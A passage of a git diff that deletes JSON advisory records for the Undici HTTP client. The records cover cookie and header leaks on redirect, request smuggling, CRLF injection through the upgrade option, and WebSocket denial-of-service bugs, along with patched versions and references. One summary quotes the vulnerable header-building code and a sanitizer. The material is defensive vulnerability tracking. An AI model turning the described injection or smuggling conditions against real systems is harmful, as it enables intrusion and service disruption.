"osv-batch"
],
"candidate_count": 1
}
}

81
08-threat-intel/registry/advisories/undici--CVE-2023-45143.json
查看文件

@@ -1,81 +0,0 @@
{
"canonical_id": "undici--CVE-2023-45143",
"system_id": "undici",
"display_name": "Undici",
"category": "frameworks",
"advisory_mode": "core",
"title": "Undici's cookie header not cleared on cross-origin redirect in fetch",
"summary": "### Impact\n\nUndici clears Authorization headers on cross-origin redirects, but does not clear `Cookie` headers. By design, `cookie` headers are [forbidden request headers](https://fetch.spec.whatwg.org/#forbidden-request-header), disallowing them to be set in `RequestInit.headers` in browser environments. Since Undici handles headers more liberally than the specification, there was a disconnect from the assumptions the spec made, and Undici's implementation of fetch.\n\nAs such this may lead to accidental leakage of cookie to a 3rd-party site or a malicious attacker who can control the redirection target (ie. an open redirector) to leak the cookie to the 3rd party site.\n\n### Patches\n\nThis was patched in [e041de359221ebeae04c469e8aff4145764e6d76](https://github.com/nodejs/undici/commit/e041de359221ebeae04c469e8aff4145764e6d76), which is included in version 5.26.2.\n",
"published_at": "2023-10-16T14:05:37Z",
"updated_at": "2026-02-04T02:35:56.289390Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-q768-x9m6-m9qp",
"secondary_source_urls": [
"https://github.com/nodejs/undici/security/advisories/GHSA-wqq4-5wpv-mx2g",
"https://nvd.nist.gov/vuln/detail/CVE-2023-45143",
"https://github.com/nodejs/undici/commit/e041de359221ebeae04c469e8aff4145764e6d76",
"https://hackerone.com/reports/2166948",
"https://github.com/nodejs/undici",
"https://github.com/nodejs/undici/releases/tag/v5.26.2",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3N4NJ7FR4X4FPZUGNTQAPSTVB2HB2Y4A",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/E72T67UPDRXHIDLO3OROR25YAMN4GGW5",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FNA62Q767CFAFHBCDKYNPBMZWB7TWYVU",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HT7T2R4MQKLIF4ODV4BDLPARWFPCJ5CZ",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKYHSZQFDNR7RSA7LHVLLIAQMVYCUGBG",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/X6QXN4ORIVF6XBW4WWFE7VNPVC74S45Y"
],
"aliases": [
"CVE-2023-45143",
"GHSA-wqq4-5wpv-mx2g"
],
"cve_ids": [
"CVE-2023-45143"
],
"ghsa_ids": [
"GHSA-wqq4-5wpv-mx2g"
],
"osv_ids": [
"GHSA-wqq4-5wpv-mx2g"
],
"affected_versions": [
"introduced=0, fixed<5.26.2"
],
"fixed_versions": [
"5.26.2"
],
"package_name": "undici",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2023-45143.md",
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary",
"token-cookie-storage"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Undici"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

79
08-threat-intel/registry/advisories/undici--CVE-2024-30260.json
查看文件

@@ -1,79 +0,0 @@
{
"canonical_id": "undici--CVE-2024-30260",
"system_id": "undici",
"display_name": "Undici",
"category": "frameworks",
"advisory_mode": "core",
"title": "Undici's Proxy-Authorization header not cleared on cross-origin redirect for dispatch, request, stream, pipeline",
"summary": "### Impact\n\nUndici cleared Authorization and Proxy-Authorization headers for `fetch()`, but did not clear them for `undici.request()`.\n\n### Patches\n\nThis has been patched in https://github.com/nodejs/undici/commit/6805746680d27a5369d7fb67bc05f95a28247d75.\nFixes has been released in v5.28.4 and v6.11.1.\n\n### Workarounds\n\nuse `fetch()` or disable `maxRedirections`.\n\n### References\n\nLinzi Shang reported this.\n\n* https://hackerone.com/reports/2408074\n* https://github.com/nodejs/undici/security/advisories/GHSA-3787-6prv-h9w3",
"published_at": "2024-04-04T14:20:39Z",
"updated_at": "2025-11-04T19:44:28Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-m4v8-wqvr-p9f7",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2024-30260",
"https://github.com/nodejs/undici/commit/64e3402da4e032e68de46acb52800c9a06aaea3f",
"https://github.com/nodejs/undici/commit/6805746680d27a5369d7fb67bc05f95a28247d75",
"https://hackerone.com/reports/2408074",
"https://github.com/nodejs/undici",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HQVHWAS6WDXXIU7F72XI55VZ2LTZUB33",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NC3V3HFZ5MOJRZDY5ZELL6REIRSPFROJ",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P6Q4RGETHVYVHDIQGTJGU5AV6NJEI67E",
"https://security.netapp.com/advisory/ntap-20240905-0008"
],
"aliases": [
"CVE-2024-30260",
"GHSA-m4v8-wqvr-p9f7"
],
"cve_ids": [
"CVE-2024-30260"
],
"ghsa_ids": [
"GHSA-m4v8-wqvr-p9f7"
],
"osv_ids": [
"GHSA-m4v8-wqvr-p9f7"
],
"affected_versions": [
"introduced=0, fixed<5.28.4",
"introduced=6.0.0, fixed<6.11.1"
],
"fixed_versions": [
"5.28.4",
"6.11.1"
],
"package_name": "undici",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2024-30260.md",
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Undici"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

79
08-threat-intel/registry/advisories/undici--CVE-2024-30261.json
查看文件

@@ -1,79 +0,0 @@
{
"canonical_id": "undici--CVE-2024-30261",
"system_id": "undici",
"display_name": "Undici",
"category": "frameworks",
"advisory_mode": "core",
"title": "Undici's fetch with integrity option is too lax when algorithm is specified but hash value is in incorrect",
"summary": "### Impact\n\nIf an attacker can alter the `integrity` option passed to `fetch()`, they can let `fetch()` accept requests as valid even if they have been tampered.\n\n### Patches\n\nFixed in https://github.com/nodejs/undici/commit/d542b8cd39ec1ba303f038ea26098c3f355974f3.\nFixes has been released in v5.28.4 and v6.11.1.\n\n\n### Workarounds\n\nEnsure that `integrity` cannot be tampered with.\n\n### References\n\nhttps://hackerone.com/reports/2377760",
"published_at": "2024-04-04T14:20:54Z",
"updated_at": "2025-11-04T19:44:42Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-9qxr-qj54-h672",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2024-30261",
"https://github.com/nodejs/undici/commit/2b39440bd9ded841c93dd72138f3b1763ae26055",
"https://github.com/nodejs/undici/commit/d542b8cd39ec1ba303f038ea26098c3f355974f3",
"https://hackerone.com/reports/2377760",
"https://github.com/nodejs/undici",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HQVHWAS6WDXXIU7F72XI55VZ2LTZUB33",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NC3V3HFZ5MOJRZDY5ZELL6REIRSPFROJ",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P6Q4RGETHVYVHDIQGTJGU5AV6NJEI67E",
"https://security.netapp.com/advisory/ntap-20240905-0008"
],
"aliases": [
"CVE-2024-30261",
"GHSA-9qxr-qj54-h672"
],
"cve_ids": [
"CVE-2024-30261"
],
"ghsa_ids": [
"GHSA-9qxr-qj54-h672"
],
"osv_ids": [
"GHSA-9qxr-qj54-h672"
],
"affected_versions": [
"introduced=0, fixed<5.28.4",
"introduced=6.0.0, fixed<6.11.1"
],
"fixed_versions": [
"5.28.4",
"6.11.1"
],
"package_name": "undici",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2024-30261.md",
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Undici"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

80
08-threat-intel/registry/advisories/undici--CVE-2025-22150.json
查看文件

@@ -1,80 +0,0 @@
{
"canonical_id": "undici--CVE-2025-22150",
"system_id": "undici",
"display_name": "Undici",
"category": "frameworks",
"advisory_mode": "core",
"title": "Use of Insufficiently Random Values in undici",
"summary": "### Impact\n\n[Undici `fetch()` uses Math.random()](https://github.com/nodejs/undici/blob/8b06b8250907d92fead664b3368f1d2aa27c1f35/lib/web/fetch/body.js#L113) to choose the boundary for a multipart/form-data request. It is known that the output of Math.random() can be predicted if several of its generated values are known.\n\nIf there is a mechanism in an app that sends multipart requests to an attacker-controlled website, they can use this to leak the necessary values. Therefore, An attacker can tamper with the requests going to the backend APIs if certain conditions are met.\n\n### Patches\n\nThis is fixed in 5.28.5; 6.21.1; 7.2.3.\n\n### Workarounds\n\nDo not issue multipart requests to attacker controlled servers.\n\n### References\n\n* https://hackerone.com/reports/2913312\n* https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f\n",
"published_at": "2025-01-21T21:10:47Z",
"updated_at": "2026-02-04T02:29:26.373390Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-c76h-2ccp-4975",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-22150",
"https://github.com/nodejs/undici/commit/711e20772764c29f6622ddc937c63b6eefdf07d0",
"https://github.com/nodejs/undici/commit/c2d78cd19fe4f4c621424491e26ce299e65e934a",
"https://github.com/nodejs/undici/commit/c3acc6050b781b827d80c86cbbab34f14458d385",
"https://hackerone.com/reports/2913312",
"https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f",
"https://github.com/nodejs/undici",
"https://github.com/nodejs/undici/blob/8b06b8250907d92fead664b3368f1d2aa27c1f35/lib/web/fetch/body.js#L113"
],
"aliases": [
"CVE-2025-22150",
"GHSA-c76h-2ccp-4975"
],
"cve_ids": [
"CVE-2025-22150"
],
"ghsa_ids": [
"GHSA-c76h-2ccp-4975"
],
"osv_ids": [
"GHSA-c76h-2ccp-4975"
],
"affected_versions": [
"introduced=4.5.0, fixed<5.28.5",
"introduced=6.0.0, fixed<6.21.1",
"introduced=7.0.0, fixed<7.2.3"
],
"fixed_versions": [
"5.28.5",
"6.21.1",
"7.2.3"
],
"package_name": "undici",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2025-22150.md",
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Undici"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

77
08-threat-intel/registry/advisories/undici--CVE-2025-47279.json
查看文件

@@ -1,77 +0,0 @@
{
"canonical_id": "undici--CVE-2025-47279",
"system_id": "undici",
"display_name": "Undici",
"category": "frameworks",
"advisory_mode": "core",
"title": "undici Denial of Service attack via bad certificate data",
"summary": "### Impact\n\nApplications that use undici to implement a webhook-like system are vulnerable. If the attacker set up a server with an invalid certificate, and they can force the application to call the webhook repeatedly, then they can cause a memory leak. \n\n### Patches\n\nThis has been patched in https://github.com/nodejs/undici/pull/4088.\n\n### Workarounds\n\nIf a webhook fails, avoid keep calling it repeatedly.\n\n### References\n\nReported as: https://github.com/nodejs/undici/issues/3895",
"published_at": "2025-05-15T14:15:06Z",
"updated_at": "2026-02-06T22:08:08.311705Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-cxrh-j4jr-qwg3",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-47279",
"https://github.com/nodejs/undici/issues/3895",
"https://github.com/nodejs/undici/pull/4088",
"https://github.com/nodejs/undici/commit/f317618ec28753a4218beccea048bcf89c36db25",
"https://github.com/nodejs/undici"
],
"aliases": [
"CVE-2025-47279",
"GHSA-cxrh-j4jr-qwg3"
],
"cve_ids": [
"CVE-2025-47279"
],
"ghsa_ids": [
"GHSA-cxrh-j4jr-qwg3"
],
"osv_ids": [
"GHSA-cxrh-j4jr-qwg3"
],
"affected_versions": [
"introduced=0, fixed<5.29.0",
"introduced=6.0.0, fixed<6.21.2",
"introduced=7.0.0, fixed<7.5.0"
],
"fixed_versions": [
"5.29.0",
"6.21.2",
"7.5.0"
],
"package_name": "undici",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2025-47279.md",
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Undici"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

77
08-threat-intel/registry/advisories/undici--CVE-2026-1525.json
查看文件

@@ -1,77 +0,0 @@
{
"canonical_id": "undici--CVE-2026-1525",
"system_id": "undici",
"display_name": "Undici",
"category": "frameworks",
"advisory_mode": "core",
"title": "Undici has an HTTP Request/Response Smuggling issue",
"summary": "### Impact\n\nUndici allows duplicate HTTP `Content-Length` headers when they are provided in an array with case-variant names (e.g., `Content-Length` and `content-length`). This produces malformed HTTP/1.1 requests with multiple conflicting `Content-Length` values on the wire.\n\n**Who is impacted:**\n - Applications using `undici.request()`, `undici.Client`, or similar low-level APIs with headers passed as flat arrays\n - Applications that accept user-controlled header names without case-normalization\n\n**Potential consequences:**\n - **Denial of Service**: Strict HTTP parsers (proxies, servers) will reject requests with duplicate `Content-Length` headers (400 Bad Request)\n - **HTTP Request Smuggling**: In deployments where an intermediary and backend interpret duplicate headers inconsistently (e.g., one uses the first value, the other uses the last), this can enable request smuggling attacks leading to ACL bypass, cache poisoning, or credential hijacking\n\n### Patches\n\n Patched in the undici version v7.24.0 and v6.24.0. Users should upgrade to this version or later.\n\n### Workarounds\n\n If upgrading is not immediately possible:\n\n 1. **Validate header names**: Ensure no duplicate `Content-Length` headers (case-insensitive) are present before passing headers to undici\n 2. **Use object format**: Pass headers as a plain object (`{ 'content-length': '123' }`) rather than an array, which naturally deduplicates by key\n 3. **Sanitize user input**: If headers originate from user input, normalize header names to lowercase and reject duplicates",
"published_at": "2026-03-13T20:07:03Z",
"updated_at": "2026-03-14T09:19:54.772219Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-2mjp-6q6p-2qxm",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-1525",
"https://hackerone.com/reports/3556037",
"https://cna.openjsf.org/security-advisories.html",
"https://cwe.mitre.org/data/definitions/444.html",
"https://github.com/nodejs/undici",
"https://www.rfc-editor.org/rfc/rfc9110.html#section-8.6"
],
"aliases": [
"CVE-2026-1525",
"GHSA-2mjp-6q6p-2qxm"
],
"cve_ids": [
"CVE-2026-1525"
],
"ghsa_ids": [
"GHSA-2mjp-6q6p-2qxm"
],
"osv_ids": [
"GHSA-2mjp-6q6p-2qxm"
],
"affected_versions": [
"introduced=0, fixed<6.24.0",
"introduced=7.0.0, fixed<7.24.0"
],
"fixed_versions": [
"6.24.0",
"7.24.0"
],
"package_name": "undici",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2026-1525.md",
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary",
"request-smuggling-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Undici"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

77
08-threat-intel/registry/advisories/undici--CVE-2026-1526.json
查看文件

@@ -1,77 +0,0 @@
{
"canonical_id": "undici--CVE-2026-1526",
"system_id": "undici",
"display_name": "Undici",
"category": "frameworks",
"advisory_mode": "core",
"title": "Undici has Unbounded Memory Consumption in WebSocket permessage-deflate Decompression",
"summary": "## Description\n\nThe undici WebSocket client is vulnerable to a denial-of-service attack via unbounded memory consumption during permessage-deflate decompression. When a WebSocket connection negotiates the permessage-deflate extension, the client decompresses incoming compressed frames without enforcing any limit on the decompressed data size. A malicious WebSocket server can send a small compressed frame (a \"decompression bomb\") that expands to an extremely large size in memory, causing the Node.js process to exhaust available memory and crash or become unresponsive.\n\nThe vulnerability exists in the `PerMessageDeflate.decompress()` method, which accumulates all decompressed chunks in memory and concatenates them into a single Buffer without checking whether the total size exceeds a safe threshold.\n\n## Impact\n\n- Remote denial of service against any Node.js application using undici's WebSocket client\n- A single compressed WebSocket frame of ~6 MB can decompress to ~1 GB or more\n- Memory exhaustion occurs in native/external memory, bypassing V8 heap limits\n- No application-level mitigation is possible as decompression occurs before message delivery\n\n### Patches\n\nUsers should upgrade to fixed versions.\n\n### Workarounds\n\nNo workaround are possible.",
"published_at": "2026-03-13T20:41:56Z",
"updated_at": "2026-03-13T20:54:25.563997Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-vrm6-8vpv-qv8q",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-1526",
"https://hackerone.com/reports/3481206",
"https://cna.openjsf.org/security-advisories.html",
"https://datatracker.ietf.org/doc/html/rfc7692",
"https://github.com/nodejs/undici",
"https://owasp.org/www-community/attacks/Denial_of_Service"
],
"aliases": [
"CVE-2026-1526",
"GHSA-vrm6-8vpv-qv8q"
],
"cve_ids": [
"CVE-2026-1526"
],
"ghsa_ids": [
"GHSA-vrm6-8vpv-qv8q"
],
"osv_ids": [
"GHSA-vrm6-8vpv-qv8q"
],
"affected_versions": [
"introduced=0, fixed<6.24.0",
"introduced=7.0.0, fixed<7.24.0"
],
"fixed_versions": [
"6.24.0",
"7.24.0"
],
"package_name": "undici",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2026-1526.md",
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary",
"plugin-extension-trust-policy"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Undici"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

74
08-threat-intel/registry/advisories/undici--CVE-2026-1527.json
查看文件

@@ -1,74 +0,0 @@
{
"canonical_id": "undici--CVE-2026-1527",
"system_id": "undici",
"display_name": "Undici",
"category": "frameworks",
"advisory_mode": "core",
"title": "Undici has CRLF Injection in undici via `upgrade` option",
"summary": "### Impact\n\nWhen an application passes user-controlled input to the `upgrade` option of `client.request()`, an attacker can inject CRLF sequences (`\\r\\n`) to:\n\n1. Inject arbitrary HTTP headers\n2. Terminate the HTTP request prematurely and smuggle raw data to non-HTTP services (Redis, Memcached, Elasticsearch)\n\nThe vulnerability exists because undici writes the `upgrade` value directly to the socket without validating for invalid header characters:\n\n```javascript\n// lib/dispatcher/client-h1.js:1121\nif (upgrade) {\n header += `connection: upgrade\\r\\nupgrade: ${upgrade}\\r\\n`\n}\n```\n\n### Patches\n\n Patched in the undici version v7.24.0 and v6.24.0. Users should upgrade to this version or later.\n\n### Workarounds\n\nSanitize the `upgrade` option string before passing to undici:\n\n```javascript\nfunction sanitizeUpgrade(value) {\n if (/[\\r\\n]/.test(value)) {\n throw new Error('Invalid upgrade value')\n }\n return value\n}\n\nclient.request({\n upgrade: sanitizeUpgrade(userInput)\n})\n```",
"published_at": "2026-03-13T20:41:26Z",
"updated_at": "2026-03-13T20:54:25.572106Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-4992-7rv2-5pvq",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-1527",
"https://hackerone.com/reports/3487198",
"https://cna.openjsf.org/security-advisories.html",
"https://github.com/nodejs/undici"
],
"aliases": [
"CVE-2026-1527",
"GHSA-4992-7rv2-5pvq"
],
"cve_ids": [
"CVE-2026-1527"
],
"ghsa_ids": [
"GHSA-4992-7rv2-5pvq"
],
"osv_ids": [
"GHSA-4992-7rv2-5pvq"
],
"affected_versions": [
"introduced=0, fixed<6.24.0",
"introduced=7.0.0, fixed<7.24.0"
],
"fixed_versions": [
"6.24.0",
"7.24.0"
],
"package_name": "undici",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2026-1527.md",
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Undici"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

74
08-threat-intel/registry/advisories/undici--CVE-2026-1528.json
查看文件

@@ -1,74 +0,0 @@
{
"canonical_id": "undici--CVE-2026-1528",
"system_id": "undici",
"display_name": "Undici",
"category": "frameworks",
"advisory_mode": "core",
"title": "Undici: Malicious WebSocket 64-bit length overflows parser and crashes the client",
"summary": "### Impact\nA server can reply with a WebSocket frame using the 64-bit length form and an extremely large length. undici's ByteParser overflows internal math, ends up in an invalid state, and throws a fatal TypeError that terminates the process. \n\n### Patches\n\n\n Patched in the undici version v7.24.0 and v6.24.0. Users should upgrade to this version or later.\n\n### Workarounds\n\nThere are no workarounds.",
"published_at": "2026-03-13T20:07:26Z",
"updated_at": "2026-03-14T09:17:45.838435Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-f269-vfmq-vjvj",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-1528",
"https://hackerone.com/reports/3537648",
"https://cna.openjsf.org/security-advisories.html",
"https://github.com/nodejs/undici"
],
"aliases": [
"CVE-2026-1528",
"GHSA-f269-vfmq-vjvj"
],
"cve_ids": [
"CVE-2026-1528"
],
"ghsa_ids": [
"GHSA-f269-vfmq-vjvj"
],
"osv_ids": [
"GHSA-f269-vfmq-vjvj"
],
"affected_versions": [
"introduced=6.0.0, fixed<6.24.0",
"introduced=7.0.0, fixed<7.24.0"
],
"fixed_versions": [
"6.24.0",
"7.24.0"
],
"package_name": "undici",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2026-1528.md",
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Undici"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

73
08-threat-intel/registry/advisories/undici--CVE-2026-22036.json
查看文件

@@ -1,73 +0,0 @@
{
"canonical_id": "undici--CVE-2026-22036",
"system_id": "undici",
"display_name": "Undici",
"category": "frameworks",
"advisory_mode": "core",
"title": "Undici has an unbounded decompression chain in HTTP responses on Node.js Fetch API via Content-Encoding leads to resource exhaustion",
"summary": "### Impact\n\nThe `fetch()` API supports chained HTTP encoding algorithms for response content according to RFC 9110 (e.g., Content-Encoding: gzip, br). This is also supported by the undici decompress interceptor.\n\nHowever, the number of links in the decompression chain is unbounded and the default maxHeaderSize allows a malicious server to insert thousands compression steps leading to high CPU usage and excessive memory allocation.\n\n### Patches\n\nUpgrade to 7.18.2 or 6.23.0.\n\n### Workarounds\n\nIt is possible to apply an undici interceptor and filter long `Content-Encoding` sequences manually.\n\n### References\n\n* https://hackerone.com/reports/3456148\n* https://github.com/advisories/GHSA-gm62-xv2j-4w53\n* https://curl.se/docs/CVE-2022-32206.html",
"published_at": "2026-01-14T21:06:08Z",
"updated_at": "2026-02-04T02:56:17.456091Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-g9mf-h72j-4rw9",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-22036",
"https://github.com/nodejs/undici/commit/b04e3cbb569c1596f86c108e9b52c79d8475dcb3",
"https://github.com/nodejs/undici"
],
"aliases": [
"CVE-2026-22036",
"GHSA-g9mf-h72j-4rw9"
],
"cve_ids": [
"CVE-2026-22036"
],
"ghsa_ids": [
"GHSA-g9mf-h72j-4rw9"
],
"osv_ids": [
"GHSA-g9mf-h72j-4rw9"
],
"affected_versions": [
"introduced=7.0.0, fixed<7.18.2",
"introduced=0, fixed<6.23.0"
],
"fixed_versions": [
"7.18.2",
"6.23.0"
],
"package_name": "undici",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2026-22036.md",
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Undici"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

77
08-threat-intel/registry/advisories/undici--CVE-2026-2229.json
查看文件

@@ -1,77 +0,0 @@
{
"canonical_id": "undici--CVE-2026-2229",
"system_id": "undici",
"display_name": "Undici",
"category": "frameworks",
"advisory_mode": "core",
"title": "Undici has Unhandled Exception in WebSocket Client Due to Invalid server_max_window_bits Validation",
"summary": "### Impact\n\nThe undici WebSocket client is vulnerable to a denial-of-service attack due to improper validation of the `server_max_window_bits` parameter in the permessage-deflate extension. When a WebSocket client connects to a server, it automatically advertises support for permessage-deflate compression. A malicious server can respond with an out-of-range `server_max_window_bits` value (outside zlib's valid range of 8-15). When the server subsequently sends a compressed frame, the client attempts to create a zlib InflateRaw instance with the invalid windowBits value, causing a synchronous RangeError exception that is not caught, resulting in immediate process termination.\n\nThe vulnerability exists because:\n\n1. The `isValidClientWindowBits()` function only validates that the value contains ASCII digits, not that it falls within the valid range 8-15\n2. The `createInflateRaw()` call is not wrapped in a try-catch block\n3. The resulting exception propagates up through the call stack and crashes the Node.js process\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_",
"published_at": "2026-03-13T20:41:41Z",
"updated_at": "2026-03-13T20:54:26.149214Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-v9p9-hfj2-hcw8",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-2229",
"https://hackerone.com/reports/3487486",
"https://cna.openjsf.org/security-advisories.html",
"https://datatracker.ietf.org/doc/html/rfc7692",
"https://github.com/nodejs/undici",
